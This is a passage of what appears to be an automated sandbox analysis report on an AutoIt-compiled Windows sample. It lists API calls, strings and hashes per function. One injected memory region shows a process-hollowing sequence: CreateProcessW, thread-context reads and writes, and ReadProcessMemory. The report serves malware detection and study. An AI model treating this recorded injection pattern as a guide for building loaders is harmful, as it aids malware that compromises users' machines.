                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                      • API String ID: 3290436268-3101561225
                                                                      • Opcode ID: a28b92ce42c0969d0580c80d95df29910caf09e4f9bc409f5b49c04457be9cea
                                                                      • Instruction ID: df395008ea6071cf081cf4119e593a77fb469452163e82176e35f97dfa2267d8
                                                                      • Opcode Fuzzy Hash: a28b92ce42c0969d0580c80d95df29910caf09e4f9bc409f5b49c04457be9cea
                                                                      • Instruction Fuzzy Hash: 00A1A47695A2D4DFC725D76DBC813BD7FE47B26300B0C58A9E88593A32D220460DDB23

                                                                      Control-flow Graph (entry c242a2; rendered graph and executed/not-executed colouring omitted). API calls along the graph: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource.
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C250AA,?,?,00000000,00000000), ref: 00C242B2
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C250AA,?,?,00000000,00000000), ref: 00C242C9
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20), ref: 00C635BE
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20), ref: 00C635D3
                                                                      • LockResource.KERNEL32(00C250AA,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20,?), ref: 00C635E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 75c7461af66aa40c8b018f6f9a6b3ca241d12a061dc769340d51e6fffe336d2f
                                                                      • Instruction ID: 575fb7980e9cdbe4cb7df6f0d7a614ef3f7f49f473b4a454a3f654ad45f4298a
                                                                      • Opcode Fuzzy Hash: 75c7461af66aa40c8b018f6f9a6b3ca241d12a061dc769340d51e6fffe336d2f
                                                                      • Instruction Fuzzy Hash: 45118E74200700FFDB258BA6EC88F6B7BB9EBC5B51F104269F412D6690DB71DD008631

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C22D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 00C22D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C22D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00C22D5F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C22D6F
                                                                      • LoadIconW.USER32(000000A9), ref: 00C22D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C22D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 48cb3919f34594d187c80732589acb9d7ca6f88662b16abad4bad662f7a32075
                                                                      • Instruction ID: c874d4120f9da2bdab68b8a3a19fa68037f7382f9eb0b89d504458baa29af947
                                                                      • Opcode Fuzzy Hash: 48cb3919f34594d187c80732589acb9d7ca6f88662b16abad4bad662f7a32075
                                                                      • Instruction Fuzzy Hash: EB2193B5911318EFDB00DFA4E889BEDBBB4FB08701F14421AF951A62A0DBB55644CF91

                                                                      Control-flow Graph (entry c6065b; rendered graph and executed/not-executed colouring omitted). API calls along the graph: GetFileType, GetLastError, CloseHandle; subcalls c6042f, c55221, c4f2c6, c4f2d9, c6039a, c4f2a3, c5516a, c6014d, c605ab, c586ae, c55333.
                                                                      APIs
                                                                        • Part of subcall function 00C6039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C60704,?,?,00000000,?,00C60704,00000000,0000000C), ref: 00C603B7
                                                                      • GetLastError.KERNEL32 ref: 00C6076F
                                                                      • __dosmaperr.LIBCMT ref: 00C60776
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00C60782
                                                                      • GetLastError.KERNEL32 ref: 00C6078C
                                                                      • __dosmaperr.LIBCMT ref: 00C60795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C607B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00C608FF
                                                                      • GetLastError.KERNEL32 ref: 00C60931
                                                                      • __dosmaperr.LIBCMT ref: 00C60938
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: b473bc92d311320b5b8d5c9a4614c67877c4124be1115801b4c826cc0852addd
                                                                      • Instruction ID: 4498fb81f6e140ada7c5fb8000bc93d0eb991f4a11b314791d475d23cc92d894
                                                                      • Opcode Fuzzy Hash: b473bc92d311320b5b8d5c9a4614c67877c4124be1115801b4c826cc0852addd
                                                                      • Instruction Fuzzy Hash: 8FA11932A141048FDF29EF68D891BAE7BE1AB46320F24015DF815AB3D2D7319D13DB51

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00C23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CF1418,?,00C22E7F,?,?,?,00000000), ref: 00C23A78
                                                                        • Part of subcall function 00C23357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C23379
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C2356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C6318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C631CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C63210
                                                                      • _wcslen.LIBCMT ref: 00C63277
                                                                      • _wcslen.LIBCMT ref: 00C63286
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
                                                                      • Opcode ID: 34f9f96017d06a0985e3b2cc042a986032d0249ed63c27ef3129f53d3e2f8b4b
                                                                      • Instruction ID: 832550c77ee87eedf93035d7e0ce599f1b3feed97b8dd6a4a2619ae642de9620
                                                                      • Opcode Fuzzy Hash: 34f9f96017d06a0985e3b2cc042a986032d0249ed63c27ef3129f53d3e2f8b4b
                                                                      • Instruction Fuzzy Hash: EA7158B14043119FC314EF69E881AAFBBE8FF95740F40082EF555831B1EB349A49DB62

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C22B8E
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00C22B9D
                                                                      • LoadIconW.USER32(00000063), ref: 00C22BB3
                                                                      • LoadIconW.USER32(000000A4), ref: 00C22BC5
                                                                      • LoadIconW.USER32(000000A2), ref: 00C22BD7
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C22BEF
                                                                      • RegisterClassExW.USER32(?), ref: 00C22C40
                                                                        • Part of subcall function 00C22CD4: GetSysColorBrush.USER32(0000000F), ref: 00C22D07
                                                                        • Part of subcall function 00C22CD4: RegisterClassExW.USER32(00000030), ref: 00C22D31
                                                                        • Part of subcall function 00C22CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C22D42
                                                                        • Part of subcall function 00C22CD4: InitCommonControlsEx.COMCTL32(?), ref: 00C22D5F
                                                                        • Part of subcall function 00C22CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C22D6F
                                                                        • Part of subcall function 00C22CD4: LoadIconW.USER32(000000A9), ref: 00C22D85
                                                                        • Part of subcall function 00C22CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C22D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: f07bbd3559d42480ec2bba9df5dd9fdec49a7cc65753cbf197c3982c187eb96b
                                                                      • Instruction ID: 3a1c936d2516d1a4c3ffb925519768383f89cebc6fa2f65d5bb8d16d80917558
                                                                      • Opcode Fuzzy Hash: f07bbd3559d42480ec2bba9df5dd9fdec49a7cc65753cbf197c3982c187eb96b
                                                                      • Instruction Fuzzy Hash: 04211A74E00315EBDB109FA6EC95BBE7FB4FB48B50F08011AEA00A66B0D7B10548DF91

                                                                      Control-flow Graph (entry c23170; rendered graph and executed/not-executed colouring omitted). API calls along the graph: DefWindowProcW, PostQuitMessage, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus; subcalls c218e2, c3e499, c8bf30, c230f2, c23c50, c8c161, c80ad7, c2326f, c23837.
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C2316A,?,?), ref: 00C231D8
                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00C2316A,?,?), ref: 00C23204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C23227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C2316A,?,?), ref: 00C23232
                                                                      • CreatePopupMenu.USER32 ref: 00C23246
                                                                      • PostQuitMessage.USER32(00000000), ref: 00C23267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 2fcfcf1e2d30aac5eb5f37de291e4d9397c7023a76963bd9d30700fee15e490c
                                                                      • Instruction ID: 3e8166f0ac0d4102081a277bd88c79e605cdfbd6e5097357f70fc8cde74ceb36
                                                                      • Opcode Fuzzy Hash: 2fcfcf1e2d30aac5eb5f37de291e4d9397c7023a76963bd9d30700fee15e490c
                                                                      • Instruction Fuzzy Hash: 844119352402A4E7DF251B78BD8DB7D3A29EB05350F080125F951969E2CB79CB40E7A2

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 0314C1A0-0314C4A2; API calls CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree; subcalls 03149BB0, 0314D0B0, 0314D300, 0314D110 (graph edge data omitted)
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0314C271
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0314C497
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                      • Instruction ID: 96dca121e3196fabcca211532662adf5794f05ca87a3a81b787427c9b860a856
                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                      • Instruction Fuzzy Hash: D9A11775E01209EBDB14CFA4C998BEEBBB5FF48304F248199E505BB280D7759A81CF94

                                                                      Control-flow Graph
                                                                      Control-flow graph: single basic block 00C22C63-00C22CD3; API calls CreateWindowExW (x2), ShowWindow (x2)
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C22C91
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C22CB2
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C21CAD,?), ref: 00C22CC6
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C21CAD,?), ref: 00C22CCF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: 7f45a87ee89fdb4fa40aa68143275ab475a6abff42f4ac38a440e98b8b160040
                                                                      • Instruction ID: d87b1f67847f975d00776883f5f598a51ab7309dba1edf886e1e1f6441f0741b
                                                                      • Opcode Fuzzy Hash: 7f45a87ee89fdb4fa40aa68143275ab475a6abff42f4ac38a440e98b8b160040
                                                                      • Instruction Fuzzy Hash: 9EF0DA76940290BAEB311B17AC48FBB3EBDD7C7F60F04005AFD00A65B0C6615854DAB1

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 0314BF60-0314C15D; API calls CreateFileW, VirtualAlloc, ReadFile, ExitProcess; subcalls 03149BB0, 0314BE50, 0314BE90, 0314AE50, 0314BEE0 (graph edge data omitted)
                                                                      APIs
                                                                        • Part of subcall function 0314BE50: Sleep.KERNELBASE(000001F4), ref: 0314BE61
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0314C097
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: I7JOA2ALREMDDFE7U
                                                                      • API String ID: 2694422964-720986988
                                                                      • Opcode ID: 6988f70f50044c4f1be51794f99a0638fac80154e4dcacd2608b124dc2d99e9c
                                                                      • Instruction ID: 09a9d310612788901589c6dfc0bb6728b92340e587c05c348db873ea7cbbb670
                                                                      • Opcode Fuzzy Hash: 6988f70f50044c4f1be51794f99a0638fac80154e4dcacd2608b124dc2d99e9c
                                                                      • Instruction Fuzzy Hash: 40518F74D04348EBEF11DBE4C854BEEBB79AF58700F044199E248BB2C1D7B91A44CBA5

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 00C23B1C-00C23B9B; API calls RegOpenKeyExW, RegQueryValueExW, RegCloseKey (graph edge data omitted)
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B40
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B61
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C23B0F,SwapMouseButtons,00000004,?), ref: 00C23B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 83624f29372261402125faf129cd5a9b94ec09b06bc6675ded936f89fea0a849
                                                                      • Instruction ID: ac3a7b6bb841a1ecc43cc28f1e3ce6f99e48789a6425f1cbdaca580817b76ed7
                                                                      • Opcode Fuzzy Hash: 83624f29372261402125faf129cd5a9b94ec09b06bc6675ded936f89fea0a849
                                                                      • Instruction Fuzzy Hash: 021127B5611268FFDB20CFA5EC84AAEBBB8EF04744B10856AB805D7110E2359F409BA0

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 0314AE50-0314BA13; API calls CreateProcessW, Wow64GetThreadContext, ReadProcessMemory, Wow64SetThreadContext; subcalls 0314D2E0 (x3), 0314C960, 0314CAA0, 0314C8B0, 0314D300, 0314C4B0, 0314C7E0 (graph edge data omitted)
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0314B60B
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0314B6A1
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0314B6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                      • Instruction ID: 48eb3120dec4c8bba98b340e5395d20cfae9676e3d4ea4173b093c388cb60907
                                                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                      • Instruction Fuzzy Hash: A862FB74A14258DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB394E77A9E81CB59
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00C732B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: aa6e77c62de965a958b3255f7713a8135186c082f745b79597dc5b21a65345fd
                                                                      • Instruction ID: 18abf69e14f8011c94efc4cdb9baaa182f99e5964b2468cdee07151aae361a11
                                                                      • Opcode Fuzzy Hash: aa6e77c62de965a958b3255f7713a8135186c082f745b79597dc5b21a65345fd
                                                                      • Instruction Fuzzy Hash: 81C28B71A00224CFCB24DF98D884BADB7B1BF08310F248569E956BB7A1D375EE41DB91

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 00C23923-00C23A17; API calls LoadStringW, Shell_NotifyIconW; subcalls 00C26270, 00C26B57, 00C26350, 00C23FCF, 00C42340, 00C23A18, 00C44983, 00C2988F, 00C2A8C7, 00C233C6 (graph edge data omitted)
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C633A2
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C23A04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: d0aa22e7abeb7c8776c2b94b23f62154a3be3be61ce10d1ee965c6a4b2e1ff9f
                                                                      • Instruction ID: 99eadbe3d41a91bdc409fa20d2f3ab17a4c8b283f3830bc786537e70b9972387
                                                                      • Opcode Fuzzy Hash: d0aa22e7abeb7c8776c2b94b23f62154a3be3be61ce10d1ee965c6a4b2e1ff9f
                                                                      • Instruction Fuzzy Hash: E031E3715083A4ABC325EB20EC45FEFB3E8AB41310F04092AF599825A1DB749B49DBD3

                                                                      Control-flow Graph
                                                                      Control-flow graph: basic blocks 00C3FDDB-00C40697; subcalls 00C4EA0C, 00C44EAD, 00C4059C, 00C432A4, 00C405CF (graph edge data omitted)
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C40668
                                                                        • Part of subcall function 00C432A4: RaiseException.KERNEL32(?,?,?,00C4068A,?,00CF1444,?,?,?,?,?,?,00C4068A,00C21129,00CE8738,00C21129), ref: 00C43304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C40685
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: a856ad0e9ce1f173ac098b56388bb856459f0e8e6770235707b236350592e9b7
                                                                      • Instruction ID: 5f53520884f127979cc0f491dc6b15941f3ed7ed66226b56b960af289e67f58c
